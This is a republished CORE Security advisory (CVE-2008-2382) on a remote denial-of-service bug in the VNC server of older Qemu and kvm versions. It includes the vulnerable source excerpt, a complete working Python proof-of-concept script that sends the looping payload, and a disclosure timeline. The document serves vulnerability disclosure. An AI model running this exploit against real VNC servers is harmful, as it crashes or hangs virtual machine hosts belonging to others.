|
|
|
|
| |
Credit:
The information has been provided by CORE Security Technologies Advisories.
The original article can be found at: http://www.coresecurity.com/content/vnc-remote-dos
|
| |
Vulnerable Systems:
* Qemu version 0.9.1 and older
* kvm version 79 and older
Technical Description / Proof of Concept Code:
The function 'protocol_client_msg()' in the file 'vnc.c' ('qemu/vnc.c' in kvm-66) is in charge of processing incoming VNC low-level messages. A listing of the vulnerable source follows:
/-----------
vnc.c
1185: static int protocol_client_msg(VncState *vs, uint8_t *data, size_t
len)
1186: {
1187: int i;
1188: uint16_t limit;
1189:
1190: switch (data[0]) {
...
1201: case 2:
1202: if (len == 1)
1203: return 4;
1204:
1205: if (len == 4)
1206: return 4 + (read_u16(data, 2) * 4);
-----------/
When the VNC server receives a message consisting of '\x02\x00\x00\x00' the 'read_u16()' function will return zero, and an infinite loop will be triggered, because this function will be called with the len parameter always equal to 4.
Proof of Concept:
The following python script implements a basic VNC client that triggers the vulnerability on the VNC server.
*NOTE:* Some VNC servers like KVM, don't bind to 0.0.0.0 by default, but the server can still be reached from a guest VM when no VNC client is attached.
/-----------
Example:
Launch vulnerable qemu:
~$qemu ./test.img - -vnc 0.0.0.0:0
Launch attack:
~$python qemu-kvm-DoS.py localhost 5900
-----------/
/-----------
##
## vnc remote DoS
##
import socket
import time
import struct
import sys
if len(sys.argv)<3:
print "Usage: %s host port" % sys.argv[0]
exit(0)
host = sys.argv[1] # "127.0.0.1" # debian 4
port = int(sys.argv[2]) # 5900
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
# rec-send versions
srvversion = s.recv(100)
cliversion=srvversion
s.send(cliversion)
print "Server version: %s" % srvversion
#Security types
sec=s.recv(100)
print "Number of security types: %d" % ord(sec[0])
s.send(sec[1])
# Authentication result
auth=s.recv(100)
if auth=="\x00\x00\x00\x00":
print "Auth ok."
# Share desktop flag: no
s.send("\x00")
# Server framebuffer parameters:
framebuf=s.recv(100)
# Trigger the bug
s.send("\x02\x00\x00\x00\x00\xff"+struct.pack("<L",1)*5)
s.close()
-----------/
Report Timeline:
2008-12-10: Core Security Technologies notifies the Qemu, Xen and KVM teams of the vulnerability.
2008-12-11: KVM team acknowledges notification.
2008-12-12: Core sends technical details of the vulnerability to the KVM team.
2008-12-13: KVM team informs that it will inform the Qemu team, since the vulnerable code is inherited from Qemu.
2008-12-16: Core replies that the vulnerability is present in Qemu, KVM and Xen, and that its intention is to coordinate the disclosure of this issue with the three teams. The proposed publication date is January 5th, 2009.
2008-12-16: Xen team acknowledges notification.
2008-12-16: Core sends technical details to the Xen team.
2008-12-16: Qemu team confirms the vulnerability, and has patches ready.
2008-12-17: Xen informs that they are not vulnerable.
2008-12-17: Core proposes to disclose the issue on December 22nd, 2008, if both Qemu and KVM have patches ready.
2008-12-18: Qemu and KVM teams agree to publish the issue on Dec 22.
2008-12-22: The advisory CORE-2008-1210 is published.
CVE Information:
CVE-2008-2382
|
|
|
|
|
